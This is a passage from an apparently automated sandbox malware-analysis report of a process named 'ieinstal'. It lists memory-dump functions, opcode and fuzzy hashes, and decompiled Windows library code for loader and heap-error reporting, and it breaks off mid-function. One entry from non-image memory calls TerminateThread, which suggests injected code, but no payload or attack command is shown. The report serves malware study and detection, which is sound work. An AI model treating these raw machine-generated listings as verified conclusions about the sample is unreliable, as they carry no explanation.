                        • Opcode ID: ce37319bf1d45c800241b633c366733248f9369d600ffb75f19c6f28ccbb8ad2
                        • Instruction ID: 08ec6c18c677a57e3126d012898ab342a8617158af2c64a0b4cab2a631f5b38e
                        • Opcode Fuzzy Hash: ce37319bf1d45c800241b633c366733248f9369d600ffb75f19c6f28ccbb8ad2
                        • Instruction Fuzzy Hash: 7390026130100007D541715A541861B4015EBE5741F91D111E0404534CD95688D76672
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 24 1ed49710-1ed4971c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c11b1f1b01d56c333a6998da4866feb2226604b31f9b2cf3ab9e13d691bccbbf
                        • Instruction ID: 305e46a11d22b768f23b0803cb8ed7bdbd8ce0f52a89ed20b43ab229b525bf14
                        • Opcode Fuzzy Hash: c11b1f1b01d56c333a6998da4866feb2226604b31f9b2cf3ab9e13d691bccbbf
                        • Instruction Fuzzy Hash: 8990027120100407D501659A540865B00159BE4741F91D111E5014535EC6A688D27571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 21 1ed49540-1ed4954c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4c612e29c05e63055310368ceecc3df153b311dfb6270335ac7e77519d6b0334
                        • Instruction ID: 8b28c3b5ca8ea98b29563ab0259b314101f2c1dfd09699c06bc917574b346c42
                        • Opcode Fuzzy Hash: 4c612e29c05e63055310368ceecc3df153b311dfb6270335ac7e77519d6b0334
                        • Instruction Fuzzy Hash: F4900265211000070506A55A070451B00569BD9791391C121F1005530CD66288E26571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ac0bb2f209556c61d4d7dc923c43dd7899a3582e170d50529dcc628f924fedeb
                        • Instruction ID: bf4a1b2a6fbba41c0f268b4f833b6a85753f1c39c5d54dc770ab23ad316aeb0d
                        • Opcode Fuzzy Hash: ac0bb2f209556c61d4d7dc923c43dd7899a3582e170d50529dcc628f924fedeb
                        • Instruction Fuzzy Hash: 1D90026121180047D601656A4C14B1B00159BD4743F91C215E0144534CC95688E26971
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 32 1ed49a00-1ed49a0c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3a35f593bf3568f99283faa1e1b664a80371519f415e8e1a3da321f5d912cfc4
                        • Instruction ID: d96cf50bb2f487f4c66ab3e1442bfeff48a90f2c5f4cfbde232bb8fb3ee0d551
                        • Opcode Fuzzy Hash: 3a35f593bf3568f99283faa1e1b664a80371519f415e8e1a3da321f5d912cfc4
                        • Instruction Fuzzy Hash: C890027120140407D501615A481471F00159BD4742F91C111E1154535D866688D279B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 33 1ed49a20-1ed49a2c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7a8b1fef066f661b56c70f163c55a8e5ee91bfc3f8188a359559b3702153e05f
                        • Instruction ID: fd3d0dcae8788205b9f9a78abe27de4a2c371787c2eba225fedb4c1a44f351f4
                        • Opcode Fuzzy Hash: 7a8b1fef066f661b56c70f163c55a8e5ee91bfc3f8188a359559b3702153e05f
                        • Instruction Fuzzy Hash: E0900261601000474541716A884491B4015BFE5651791C221E0988530D859A88E66AB5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED498F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 29 1ed498f0-1ed498fc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 798d90e4ea58faf3964f8d6e68beeebe620f137f8ba33d880ad30f203373dcb1
                        • Instruction ID: 6ea5d153b998271c58b2af5e070f7866e71a3f509c9c310b9683df925a562424
                        • Opcode Fuzzy Hash: 798d90e4ea58faf3964f8d6e68beeebe620f137f8ba33d880ad30f203373dcb1
                        • Instruction Fuzzy Hash: 9790026160100507D502715A440462B001A9BD4681FD1C122E1014535ECA6689D3B571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 27 1ed49840-1ed4984c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 36b22f7c54ed84d738805e0e7b9d94f3f416058523195fa68158801a275ee779
                        • Instruction ID: 124baa00d307e333833cf0add9ed85597137f85ff9c401f9c61b65f89ea9baec
                        • Opcode Fuzzy Hash: 36b22f7c54ed84d738805e0e7b9d94f3f416058523195fa68158801a275ee779
                        • Instruction Fuzzy Hash: 65900261242041575946B15A440451B4016ABE46817D1C112E1404930C856798D7EA71
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 28 1ed49860-1ed4986c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 841247e33f933ccfd5ea323db0796ab0979d3d26c30fea165c40b7b1ecb7c3ca
                        • Instruction ID: 1e23902bbd3da956a1875555082d7daa78803f9b78604ff42f7803b92e255d56
                        • Opcode Fuzzy Hash: 841247e33f933ccfd5ea323db0796ab0979d3d26c30fea165c40b7b1ecb7c3ca
                        • Instruction Fuzzy Hash: B990027120100417D512615A450471B00199BD4681FD1C512E0414538D969789D3B571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 31 1ed499a0-1ed499ac LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3e798c494aee0dd4ec21c288da5685fcb58ad451ca0c9ff50fa51ece10429d45
                        • Instruction ID: ee7fddec6dd107b573a6b23fd81dbb908fb86bdefb26ab924844d899c9b7daa3
                        • Opcode Fuzzy Hash: 3e798c494aee0dd4ec21c288da5685fcb58ad451ca0c9ff50fa51ece10429d45
                        • Instruction Fuzzy Hash: 809002A134100447D501615A4414B1B0015DBE5741F91C115E1054534D865ACCD37576
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 30 1ed49910-1ed4991c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 56efc4b65d5edc0c60bdf051dbac3b8369af22c16995a1c9612e110c698397b0
                        • Instruction ID: aeab0814e45e479f7fa66cfa70d0aa4cdabc3401182abf878e7a83578975cf9c
                        • Opcode Fuzzy Hash: 56efc4b65d5edc0c60bdf051dbac3b8369af22c16995a1c9612e110c698397b0
                        • Instruction Fuzzy Hash: DF9002B120100407D541715A440475B00159BD4741F91C111E5054534E869A8DD67AB5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02D065BE, Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 2d065be 1 2d065c1-2d065e4 0->1 1->1 2 2d065e6-2d06621 TerminateThread 1->2 3 2d0662c-2d0663a 2->3 4 2d066b5-2d066c9 3->4 5 2d0663c-2d06643 3->5 5->4 6 2d06645-2d06649 5->6 6->4 7 2d0664b-2d0664f 6->7 7->4 8 2d06651-2d06655 7->8 8->4 9 2d06657-2d0665b 8->9 9->4 10 2d0665d-2d06661 9->10 10->4 11 2d06663-2d0666c 10->11 11->4 12 2d0666e-2d0667f 11->12 13 2d06680-2d0668c 12->13 14 2d06697-2d066b2 13->14 15 2d0668e-2d06692 13->15 15->4 16 2d06694-2d06695 15->16 16->13
                        APIs
                        • TerminateThread.KERNELBASE(-67E8FA2E), ref: 02D06621
                        Memory Dump Source
                        • Source File: 00000012.00000002.602573615.0000000002D06000.00000040.00000001.sdmp, Offset: 02D06000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2d06000_ieinstal.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: e3bd13cbd5f98010b54027f4de454146ad153584fdb74afffbeca4373a96aa78
                        • Instruction ID: 66c5692c999bcdcf9e8174406811f41909a6ea63623d31b4db29b4f475e2e48b
                        • Opcode Fuzzy Hash: e3bd13cbd5f98010b54027f4de454146ad153584fdb74afffbeca4373a96aa78
                        • Instruction Fuzzy Hash: 9931BD75500391CFCB60CF64C8C8BA677E6AF14218F9591E9D4198B3B2D334C994CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 17 1ed4967a-1ed4967f 18 1ed49681-1ed49688 17->18 19 1ed4968f-1ed49696 LdrInitializeThunk 17->19
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5ad577b9bfc31607e2a382606b8ff80983a72aa2280c42add41d6b2ad34bb7e7
                        • Instruction ID: bff615b52e5418df8355c0ecf15d027cb449f61d7d007588b3d2dc78aa359567
                        • Opcode Fuzzy Hash: 5ad577b9bfc31607e2a382606b8ff80983a72aa2280c42add41d6b2ad34bb7e7
                        • Instruction Fuzzy Hash: 58B09B719424C6CBD601D761460871B79117BD4741F66C155D1420651E4779C0D1F5B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 1EDBB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 1EDBB39B
                        • read from, xrefs: 1EDBB4AD, 1EDBB4B2
                        • The instruction at %p referenced memory at %p., xrefs: 1EDBB432
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1EDBB323
                        • Go determine why that thread has not released the critical section., xrefs: 1EDBB3C5
                        • The resource is owned shared by %d threads, xrefs: 1EDBB37E
                        • *** Inpage error in %ws:%s, xrefs: 1EDBB418
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1EDBB53F
                        • *** An Access Violation occurred in %ws:%s, xrefs: 1EDBB48F
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 1EDBB352
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1EDBB305
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1EDBB484
                        • an invalid address, %p, xrefs: 1EDBB4CF
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1EDBB38F
                        • This failed because of error %Ix., xrefs: 1EDBB446
                        • *** then kb to get the faulting stack, xrefs: 1EDBB51C
                        • *** enter .exr %p for the exception record, xrefs: 1EDBB4F1
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1EDBB2DC
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1EDBB476
                        • The resource is owned exclusively by thread %p, xrefs: 1EDBB374
                        • write to, xrefs: 1EDBB4A6
                        • <unknown>, xrefs: 1EDBB27E, 1EDBB2D1, 1EDBB350, 1EDBB399, 1EDBB417, 1EDBB48E
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1EDBB314
                        • The critical section is owned by thread %p., xrefs: 1EDBB3B9
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1EDBB47D
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1EDBB3D6
                        • *** enter .cxr %p for the context, xrefs: 1EDBB50D
                        • The instruction at %p tried to %s , xrefs: 1EDBB4B6
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 1EDBB2F3
                        • a NULL pointer, xrefs: 1EDBB4E0
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: c8e825c9fc62e242954ec554dd55e7259efae45478c68da5e865b84107db3a43
                        • Instruction ID: e3d8703b7d686960ccae1a2a8405617c40fd5156b854dea626c1f76ea7d8e365
                        • Opcode Fuzzy Hash: c8e825c9fc62e242954ec554dd55e7259efae45478c68da5e865b84107db3a43
                        • Instruction Fuzzy Hash: 4E81ED79900110FFCB259B06CC94EAB3F26BF47665F814754F8062B262E331DA51EBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDC1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E1EDC1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x1ece48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1ED0B150();
				} else {
					E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1edf589c);
				E1ED0B150("Heap error detected at %p (heap handle %p)\n",  *0x1edf58a0);
				_t27 =  *0x1edf5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M1EDC1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1ED0B150();
				} else {
					E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E1ED0B150("Error code: %d - %s\n",  *0x1edf5898);
				_t113 =  *0x1edf58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1ED0B150();
					} else {
						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1ED0B150("Parameter1: %p\n",  *0x1edf58a4);
				}
				_t115 =  *0x1edf58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1ED0B150();
					} else {
						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1ED0B150("Parameter2: %p\n",  *0x1edf58a8);
				}
				_t117 =  *0x1edf58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1ED0B150();
					} else {
						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1ED0B150("Parameter3: %p\n",  *0x1edf58ac);
				}
				_t119 =  *0x1edf58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E1ED0B150();
					} else {
						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1edf58b4);
					E1ED0B150("Last known valid blocks: before - %p, after - %p\n",  *0x1edf58b0);
				} else {
					_t120 =  *0x1edf58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E1ED0B150();
				} else {
					E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E1ED0B150("Stack trace available at %p\n", 0x1edf58c0);
			}











                        0x1edc1c10
                        0x1edc1c16
                        0x1edc1c1e
                        0x1edc1c3d
                        0x1edc1c3e
                        0x1edc1c20
                        0x1edc1c35
                        0x1edc1c3a
                        0x1edc1c44
                        0x1edc1c55
                        0x1edc1c5a
                        0x1edc1c65
                        0x1edc1c67
                        0x00000000
                        0x1edc1c6e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edc1c67
                        0x1edc1cdc
                        0x1edc1ce5
                        0x1edc1d04
                        0x1edc1d05
                        0x1edc1ce7
                        0x1edc1cfc
                        0x1edc1d01
                        0x1edc1d0b
                        0x1edc1d17
                        0x1edc1d1f
                        0x1edc1d25
                        0x1edc1d30
                        0x1edc1d4f
                        0x1edc1d50
                        0x1edc1d32
                        0x1edc1d47
                        0x1edc1d4c
                        0x1edc1d61
                        0x1edc1d67
                        0x1edc1d68
                        0x1edc1d6e
                        0x1edc1d79
                        0x1edc1d98
                        0x1edc1d99
                        0x1edc1d7b
                        0x1edc1d90
                        0x1edc1d95
                        0x1edc1daa
                        0x1edc1db0
                        0x1edc1db1
                        0x1edc1db7
                        0x1edc1dc2
                        0x1edc1de1
                        0x1edc1de2
                        0x1edc1dc4
                        0x1edc1dd9
                        0x1edc1dde
                        0x1edc1df3
                        0x1edc1df9
                        0x1edc1dfa
                        0x1edc1e00
                        0x1edc1e0a
                        0x1edc1e13
                        0x1edc1e32
                        0x1edc1e33
                        0x1edc1e15
                        0x1edc1e2a
                        0x1edc1e2f
                        0x1edc1e39
                        0x1edc1e4a
                        0x1edc1e02
                        0x1edc1e02
                        0x1edc1e08
                        0x00000000
                        0x00000000
                        0x1edc1e08
                        0x1edc1e5b
                        0x1edc1e7a
                        0x1edc1e7b
                        0x1edc1e5d
                        0x1edc1e72
                        0x1edc1e77
                        0x1edc1e95

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: d477b27fe7f89b3a96c1bde7b0e7015de8516e7042cc4acd466e8d026eaed90f
                        • Instruction ID: 5dd97c334e9c203eb6fcc5d042a655fc91d400e175606e5c65afaddff5ccb0d9
                        • Opcode Fuzzy Hash: d477b27fe7f89b3a96c1bde7b0e7015de8516e7042cc4acd466e8d026eaed90f
                        • Instruction Fuzzy Hash: 5661E8364141B4DFC6419BA6DD98E54B7F5EB04A70B49876EF80A5F380C735DC828F2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED13D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E1ED13D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
